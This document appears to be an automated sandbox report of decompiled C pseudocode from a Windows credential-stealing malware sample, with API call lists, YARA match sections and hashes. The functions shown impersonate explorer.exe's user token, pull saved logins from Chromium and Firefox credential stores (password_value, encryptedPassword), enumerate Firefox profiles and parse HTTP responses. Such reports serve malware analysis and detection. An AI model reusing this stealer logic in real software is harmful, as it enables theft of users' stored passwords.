                                                                        						return _t49;
                                                                        					}
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
                                                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
                                                                        • OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
                                                                        • CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
                                                                        • CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
                                                                        • CloseHandle.KERNEL32(00410B93), ref: 00402D6E
                                                                        • Process32Next.KERNEL32 ref: 00402D80
                                                                        • CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                                        • String ID: explorer.exe
                                                                        • API String ID: 3144406365-3187896405
                                                                        • Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
                                                                        • Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
                                                                        • Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				void* _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				void* _v52;
                                                                        				int _v56;
                                                                        				char* _v60;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        				int _t77;
                                                                        				int _t78;
                                                                        
                                                                        				_t55 = __eax;
                                                                        				if(_a16 == 0 ||  *0x41442d == 0) {
                                                                        					return _t55;
                                                                        				} else {
                                                                        					_t56 = _a16;
                                                                        					if( *0x41914c < _t56 &&  *0x419150 < _t56 &&  *0x419154 < _t56) {
                                                                        						E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
                                                                        						E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
                                                                        						E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
                                                                        						_push(_v32);
                                                                        						_pop( *_t16);
                                                                        						_push(_v40);
                                                                        						_pop( *_t18);
                                                                        						_v52 = 0;
                                                                        						_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
                                                                        						if(_t56 != 0 && _v52 != 0 && _v56 <= _v32) {
                                                                        							asm("cld");
                                                                        							asm("jecxz 0x4");
                                                                        							memcpy(_v40, _v52, _v56);
                                                                        							_push(_v56);
                                                                        							_pop( *_t29);
                                                                        							_t56 = LocalFree(_v52);
                                                                        							if(_v8 != 0 && _v20 != 0 && _v32 != 0) {
                                                                        								_v60 = E004017EC(_v8);
                                                                        								E00401823(_v16, _v60, _v8);
                                                                        								_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
                                                                        								if(_t77 != 0) {
                                                                        									_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
                                                                        								}
                                                                        								_t78 = _t77;
                                                                        								if(_t78 != 0) {
                                                                        									_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
                                                                        								}
                                                                        								if(_t78 == 0) {
                                                                        									E00401486(_a8, _a20);
                                                                        									E00401486(_a8,  *0x419148);
                                                                        									E004014BC(_a8, _v16, _v8);
                                                                        									E004014BC(_a8, _v28, _v20);
                                                                        									E004014BC(_a8, _v40, _v32);
                                                                        								}
                                                                        								return E004017D5(_v60);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t56;
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • LocalFree.KERNEL32(00000000,?), ref: 0040BB20
                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: ftp://$http://$https://
                                                                        • API String ID: 1884169789-2804853444
                                                                        • Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
                                                                        • Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
                                                                        • Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040B973(CHAR* _a4, intOrPtr _a8) {
                                                                        				char* _t14;
                                                                        				int _t17;
                                                                        				int _t20;
                                                                        				CHAR* _t29;
                                                                        
                                                                        				E0040282C(_a4);
                                                                        				_t14 = StrStrIA(_a4, 0x415c5b);
                                                                        				if(_t14 != 0) {
                                                                        					 *_t14 = 0;
                                                                        					E0040282C(_a4);
                                                                        					_t29 = "CONSTRAINT";
                                                                        					while(1) {
                                                                        						_t17 = lstrcmpiA(_t29, _a4);
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						if( *_t29 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							_t20 = lstrlenA(_a4);
                                                                        							if(_t20 != 0) {
                                                                        								if(lstrcmpiA(_a4, "origin_url") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x41914c);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "password_value") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419150);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "username_value") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419154);
                                                                        								}
                                                                        								return 1;
                                                                        							} else {
                                                                        								return _t20;
                                                                        							}
                                                                        						}
                                                                        						goto L15;
                                                                        					}
                                                                        					return _t17;
                                                                        				} else {
                                                                        					return _t14;
                                                                        				}
                                                                        				L15:
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860
                                                                        • StrStrIA.SHLWAPI(?,00415C5B), ref: 0040B987
                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040B9A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrlen
                                                                        • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                                        • API String ID: 3649823140-2401479949
                                                                        • Opcode ID: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
                                                                        • Instruction ID: d1a5d0e1c88d5ff09c1e1cca62af422fdfc66f56267979ae8e6772905978206e
                                                                        • Opcode Fuzzy Hash: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
                                                                        • Instruction Fuzzy Hash: D7118677210505F9CF522F65DC02ADE3E51EB66398B008137F519A81A1E3BDCDD1968C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040BE43(CHAR* _a4, intOrPtr _a8) {
                                                                        				char* _t14;
                                                                        				int _t17;
                                                                        				int _t20;
                                                                        				CHAR* _t29;
                                                                        
                                                                        				E0040282C(_a4);
                                                                        				_t14 = StrStrIA(_a4, 0x415c5b);
                                                                        				if(_t14 != 0) {
                                                                        					 *_t14 = 0;
                                                                        					E0040282C(_a4);
                                                                        					_t29 = "CONSTRAINT";
                                                                        					while(1) {
                                                                        						_t17 = lstrcmpiA(_t29, _a4);
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						if( *_t29 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							_t20 = lstrlenA(_a4);
                                                                        							if(_t20 != 0) {
                                                                        								if(lstrcmpiA(_a4, "hostname") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419158);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "encryptedPassword") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x41915c);
                                                                        								}
                                                                        								if(lstrcmpiA(_a4, "encryptedUsername") == 0) {
                                                                        									_push(_a8);
                                                                        									_pop( *0x419160);
                                                                        								}
                                                                        								return 1;
                                                                        							} else {
                                                                        								return _t20;
                                                                        							}
                                                                        						}
                                                                        						goto L15;
                                                                        					}
                                                                        					return _t17;
                                                                        				} else {
                                                                        					return _t14;
                                                                        				}
                                                                        				L15:
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860
                                                                        • StrStrIA.SHLWAPI(?,00415C5B), ref: 0040BE57
                                                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040BE79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrlen
                                                                        • String ID: CONSTRAINT$encryptedPassword$encryptedUsername$hostname
                                                                        • API String ID: 3649823140-2971371156
                                                                        • Opcode ID: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
                                                                        • Instruction ID: c71311dfb796d292e15c99594d8fb0fbbefb30d41f24959de37fc513c87e5bbe
                                                                        • Opcode Fuzzy Hash: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
                                                                        • Instruction Fuzzy Hash: 8A116077210505F6CF122F65EC02ACF3E51EB66398B008137F919A81A1E3BD8DD196CC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 44%
                                                                        			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				CHAR* _v24;
                                                                        				CHAR* _v28;
                                                                        				void* _v32;
                                                                        				void* _v36;
                                                                        				CHAR* _v40;
                                                                        				char _v44;
                                                                        				CHAR* _v48;
                                                                        				CHAR* _t46;
                                                                        				int _t50;
                                                                        				CHAR* _t54;
                                                                        				CHAR* _t57;
                                                                        				CHAR* _t59;
                                                                        				CHAR* _t65;
                                                                        				int _t68;
                                                                        				CHAR* _t69;
                                                                        				CHAR* _t70;
                                                                        				void* _t71;
                                                                        				signed int _t73;
                                                                        				signed int _t74;
                                                                        				char* _t75;
                                                                        
                                                                        				_t71 = __ecx;
                                                                        				_t73 = __edx ^ __eax;
                                                                        				_t42 = __eax ^ _t73;
                                                                        				_t74 = _t73 ^ __eax ^ _t73;
                                                                        				if( *0x414411 == 0 ||  *0x41441d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t69 =  *0x417691; // 0x0
                                                                        					while(1) {
                                                                        						_t70 = _t69;
                                                                        						__eflags = _t70;
                                                                        						if(_t70 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						E00402AF8(_t42, _t74);
                                                                        						__eflags =  *0x417695;
                                                                        						if( *0x417695 == 0) {
                                                                        							L7:
                                                                        							_v8 = 0;
                                                                        							_t46 =  *0x41441d(_t70[4], 0, _t70[4], 2, 0,  &_v8);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								_v12 = E0040294B(_t70[4]);
                                                                        								_t50 = LCMapStringA(0x400, 0x100, _t70[4], lstrlenA(_t70[4]), _v12, _t49);
                                                                        								__eflags = _t50;
                                                                        								if(_t50 == 0) {
                                                                        									L12:
                                                                        									E004017D5(_v12);
                                                                        									_t75 = "r`l`oui`";
                                                                        									L13:
                                                                        									_v8 = 0;
                                                                        									_t54 =  *0x41441d(_t70[4], 0, _t75, 2, 0,  &_v8);
                                                                        									__eflags = _t54;
                                                                        									if(_t54 != 0) {
                                                                        										goto L14;
                                                                        									}
                                                                        								} else {
                                                                        									_v8 = 0;
                                                                        									_t65 =  *0x41441d(_t70[4], 0, _v12, 2, 0,  &_v8);
                                                                        									__eflags = _t65;
                                                                        									if(_t65 == 0) {
                                                                        										goto L12;
                                                                        									} else {
                                                                        										E004017D5(_v12);
                                                                        										goto L14;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								L14:
                                                                        								_v44 = 0x20;
                                                                        								_v40 = 1;
                                                                        								_push(_t70[4]);
                                                                        								_pop( *_t23);
                                                                        								_push(_t70[8]);
                                                                        								_pop( *_t25);
                                                                        								_v28 = 0;
                                                                        								_v24 = 0;
                                                                        								_v20 = 0;
                                                                        								_v16 = 0;
                                                                        								_t57 =  &_v44;
                                                                        								_push(_t57);
                                                                        								_push(_v8);
                                                                        								L00410E96();
                                                                        								__eflags = _t57;
                                                                        								if(_t57 == 0) {
                                                                        									_v48 = 0;
                                                                        								} else {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										_push(_v16);
                                                                        										_pop( *0x4140fe);
                                                                        									}
                                                                        									_v48 = 1;
                                                                        								}
                                                                        								_t59 =  *0x414411(_v8);
                                                                        								_t60 = _t59;
                                                                        								__eflags = _t59;
                                                                        								if(__eflags != 0) {
                                                                        									E004105CE(_t60, _t71, _t74, __eflags);
                                                                        									__eflags =  *0x414409;
                                                                        									if( *0x414409 != 0) {
                                                                        										 *0x414409();
                                                                        									}
                                                                        									 *0x4140fe = 0x80000001;
                                                                        								}
                                                                        								__eflags = _v48;
                                                                        								if(_v48 != 0) {
                                                                        									_push(_v16);
                                                                        									_push(_v8);
                                                                        									L00410E9C();
                                                                        								}
                                                                        								CloseHandle(_v8);
                                                                        							}
                                                                        							asm("cld");
                                                                        							_t42 = 0;
                                                                        							_t71 = 0xffffffff;
                                                                        							asm("repne scasb");
                                                                        							__eflags =  *_t75;
                                                                        							if( *_t75 != 0) {
                                                                        								goto L13;
                                                                        							}
                                                                        						} else {
                                                                        							_t68 = lstrcmpiA( *0x417695, _t70[4]);
                                                                        							_t42 = _t68;
                                                                        							__eflags = _t68;
                                                                        							if(_t68 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        							}
                                                                        						}
                                                                        						_t69 =  *_t70;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}




























                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(?), ref: 004109D5
                                                                        • lstrlenA.KERNEL32(?,?), ref: 00410A17
                                                                        • LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
                                                                        • LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
                                                                        • UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00410B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProfileUser$CloseHandleLoadStringUnloadlstrcmpilstrlen
                                                                        • String ID: $r`l`oui`
                                                                        • API String ID: 1092964125-956245557
                                                                        • Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
                                                                        • Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
                                                                        • Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00409713(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				CHAR* _v8;
                                                                        				CHAR* _v12;
                                                                        				intOrPtr _v16;
                                                                        				CHAR* _v20;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        				intOrPtr _t38;
                                                                        				char* _t57;
                                                                        				char* _t61;
                                                                        				char* _t62;
                                                                        				CHAR* _t63;
                                                                        
                                                                        				_t33 = E00401E9C(_a8);
                                                                        				if(_t33 != 0) {
                                                                        					_t35 = E00401E9C(_a12);
                                                                        					if(_t35 != 0) {
                                                                        						if(E004024D7(_a8) != 0) {
                                                                        							_t38 = E00401D15(_a8, 0);
                                                                        						} else {
                                                                        							_t38 = E00401D15(_a8, "\\");
                                                                        						}
                                                                        						_v16 = _t38;
                                                                        						_v12 = E00401D15(_v16, "profiles.ini");
                                                                        						_v8 = E004017EC(0xfdea);
                                                                        						_v20 = E004017EC(0x1000);
                                                                        						if(E00401E53(_v12) != 0 && GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12) > 2) {
                                                                        							_t63 = _v8;
                                                                        							if( *_t63 != 0) {
                                                                        								do {
                                                                        									if(StrStrIA(_t63, "Profile") != 0 && GetPrivateProfileStringA(_t63, "Path", 0x4140dc, _v20, 0xfff, _v12) != 0) {
                                                                        										if(GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12) != 1) {
                                                                        											E004096FB(_a4, _v20, _a12);
                                                                        										} else {
                                                                        											_t57 = E00401D15(_v16, _v20);
                                                                        											_push(_t57);
                                                                        											_t61 = _t57;
                                                                        											while(1) {
                                                                        												_t62 = _t61;
                                                                        												if(_t62 == 0 ||  *_t62 == 0) {
                                                                        													break;
                                                                        												}
                                                                        												if( *_t62 == 0x2f) {
                                                                        													 *_t62 = 0x5c;
                                                                        												}
                                                                        												_t61 = _t62 + 1;
                                                                        											}
                                                                        											E004096FB(_a4, _t57, _a12);
                                                                        											E004017D5();
                                                                        										}
                                                                        									}
                                                                        									asm("cld");
                                                                        									asm("repne scasb");
                                                                        								} while ( *_t63 != 0);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v16);
                                                                        						E004017D5(_v20);
                                                                        						E004017D5(_v12);
                                                                        						E004017D5(_v8);
                                                                        						return E004096FB(_a4, _a8, _a12);
                                                                        					} else {
                                                                        						return _t35;
                                                                        					}
                                                                        				} else {
                                                                        					return _t33;
                                                                        				}
                                                                        			}















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                        • API String ID: 0-4107377610
                                                                        • Opcode ID: 4ad7dd6626449d0865b862079872fbee4eda8d38e9c2d9578c020e7ae1480238
                                                                        • Instruction ID: 9f854c8f064d301336fa07c1f25567edbfe6f4ad31a08e24bdafbc402817c31b
                                                                        • Opcode Fuzzy Hash: 4ad7dd6626449d0865b862079872fbee4eda8d38e9c2d9578c020e7ae1480238
                                                                        • Instruction Fuzzy Hash: 4B413D72910109BACF223FA1DC42AAE7B72AF55714F24817BF511751F3D77D4DA0AA08
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E004039C1(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
                                                                        				char* _v8;
                                                                        				int _v12;
                                                                        				char*** _v16;
                                                                        				char* _t47;
                                                                        				char* _t48;
                                                                        				char* _t49;
                                                                        				char* _t50;
                                                                        				void* _t54;
                                                                        				void* _t66;
                                                                        				char* _t81;
                                                                        				char* _t82;
                                                                        				void* _t83;
                                                                        				char* _t86;
                                                                        				char* _t87;
                                                                        				void* _t88;
                                                                        
                                                                        				_t72 = __edx;
                                                                        				_v8 = E004017EC(0x7d00);
                                                                        				E00401000( &_v16, __edx,  &_v16);
                                                                        				_t66 = 0;
                                                                        				while(E00403879(_a4, _v16, 0xfa00, 0xa) != 0 && E0040106A(_t39, _t72, _v16) <= 0xfa00) {
                                                                        					if(E00403973(_t72, _v16) == 0) {
                                                                        						continue;
                                                                        					}
                                                                        					E00401273(_t44, _t72, _v16);
                                                                        					_t76 =  *_v16;
                                                                        					( *_v16)[3](_v16, _v8, 0x2134, 0);
                                                                        					_v12 = 0;
                                                                        					_t47 = StrStrIA(_v8, "Content-Length:");
                                                                        					_push(_t66);
                                                                        					_t48 = _t47;
                                                                        					if(_t48 != 0) {
                                                                        						_t86 =  &(_t48[lstrlenA("Content-Length:")]);
                                                                        						_push(_t86);
                                                                        						_t87 =  &(_t86[1]);
                                                                        						asm("repne scasb");
                                                                        						 *((char*)(_t87 - 1)) = 0;
                                                                        						_v12 = StrToIntA(_t87);
                                                                        						_t88 = _t87;
                                                                        						 *((char*)(_t88 - 1)) = 0xd;
                                                                        					}
                                                                        					_pop(_t67);
                                                                        					_t49 = StrStrIA(_v8, "Location:");
                                                                        					_t50 = _t49;
                                                                        					if(_t50 != 0) {
                                                                        						_t81 =  &(_t50[lstrlenA("Location:")]);
                                                                        						_push(_t81);
                                                                        						_t82 =  &(_t81[1]);
                                                                        						asm("repne scasb");
                                                                        						 *((char*)(_t82 - 1)) = 0;
                                                                        						_push(_t82);
                                                                        						_t50 = E0040294B(_t82);
                                                                        						_t76 = _a12;
                                                                        						if(_t76 == 0) {
                                                                        							_t50 = E004017D5(_t50);
                                                                        						} else {
                                                                        							 *_t76 = _t50;
                                                                        						}
                                                                        						_pop(_t83);
                                                                        						 *((char*)(_t83 - 1)) = 0xd;
                                                                        					}
                                                                        					_pop(_t66);
                                                                        					E004012C7(_t50, _t76, _v16);
                                                                        					if(_v12 <= 0) {
                                                                        						_v12 = 0xa00000;
                                                                        					}
                                                                        					_t54 = E0040106A(E004038EB(_a4, _v16, _v12), _t76, _v16);
                                                                        					if(_t54 != 0) {
                                                                        						if(_t54 != 0) {
                                                                        							_push(_a8);
                                                                        							_push(_v16);
                                                                        							if(( *_v16)[0xd]() >= 0) {
                                                                        								_t66 = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				( *_v16)[2](_v16);
                                                                        				E004017D5(_v8);
                                                                        				return _t66;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                          • Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403A47
                                                                        • lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403A58
                                                                        • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403A79
                                                                        • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403A90
                                                                        • lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403AA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$AllocCreateGlobalLocalStream
                                                                        • String ID: Content-Length:$Location:
                                                                        • API String ID: 470334641-2400408565
                                                                        • Opcode ID: b7377cc51f20d8385b9af4971295555af70c5370bc9c8b37470087e9bf613e51
                                                                        • Instruction ID: 7570254d534122b067dba275b6dbafb516b56477de4d3a8d0c02791677091e30
                                                                        • Opcode Fuzzy Hash: b7377cc51f20d8385b9af4971295555af70c5370bc9c8b37470087e9bf613e51
                                                                        • Instruction Fuzzy Hash: BD41B335B04109BBDB11AFA2CC82B9EFF79EF41309F204177B110B62E1DB799A519A58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0040424A() {
                                                                        				char _v8;
                                                                        				struct HINSTANCE__* _t4;
                                                                        				intOrPtr* _t10;
                                                                        				struct HINSTANCE__* _t15;
                                                                        
                                                                        				_t4 = GetModuleHandleA("kernel32.dll");
                                                                        				_t15 = _t4;
                                                                        				_v8 = 0;
                                                                        				if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t10 = GetProcAddress(_t15, "IsWow64Process");
                                                                        					if(_t10 == 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						 *_t10(GetCurrentProcess(),  &_v8);
                                                                        						if(_v8 == 0) {
                                                                        							goto L5;
                                                                        						} else {
                                                                        							return 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404258
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404270
                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00404281
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00404290
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                                                        • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                        • API String ID: 977827838-3073145729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040D8B9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				char* _v28;
                                                                        				char* _v32;
                                                                        				char _v33;
                                                                        				char* _v40;
                                                                        				char* _v44;
                                                                        				char _v45;
                                                                        				void* _t28;
                                                                        				intOrPtr* _t31;
                                                                        				intOrPtr* _t35;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t43;
                                                                        				void* _t52;
                                                                        				char* _t57;
                                                                        				char* _t59;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t28 = E00401E53(_a8);
                                                                        				if(_t28 != 0) {
                                                                        					_t31 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t31;
                                                                        					if(_t31 != 0) {
                                                                        						_v24 = E004017EC(_v8);
                                                                        						E00401823(_v12, _v24, _v8);
                                                                        						_t57 = _v24;
                                                                        						while(1) {
                                                                        							__eflags =  *_t57;
                                                                        							if( *_t57 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t35 = StrStrA(_t57, "<setting name=\"");
                                                                        							__eflags = _t35;
                                                                        							if(_t35 != 0) {
                                                                        								_t59 = _t35 + lstrlenA("<setting name=\"");
                                                                        								_v28 = _t59;
                                                                        								_t38 = StrStrA(_t59, 0x4160dc);
                                                                        								__eflags = _t38;
                                                                        								if(_t38 != 0) {
                                                                        									_v33 =  *_t38;
                                                                        									_v32 = _t38;
                                                                        									_t40 = StrStrA(_t59, "value=\"");
                                                                        									__eflags = _t40;
                                                                        									if(_t40 != 0) {
                                                                        										_t57 = _t40 + lstrlenA("value=\"");
                                                                        										_v40 = _t57;
                                                                        										_t43 = StrStrA(_t57, 0x4160dc);
                                                                        										__eflags = _t43;
                                                                        										if(_t43 != 0) {
                                                                        											_v45 =  *_t43;
                                                                        											_v44 = _t43;
                                                                        											 *_v32 = 0;
                                                                        											 *_v44 = 0;
                                                                        											E0040D82C(_t52, _a4, _v28, _v40);
                                                                        											 *_v32 = _v33;
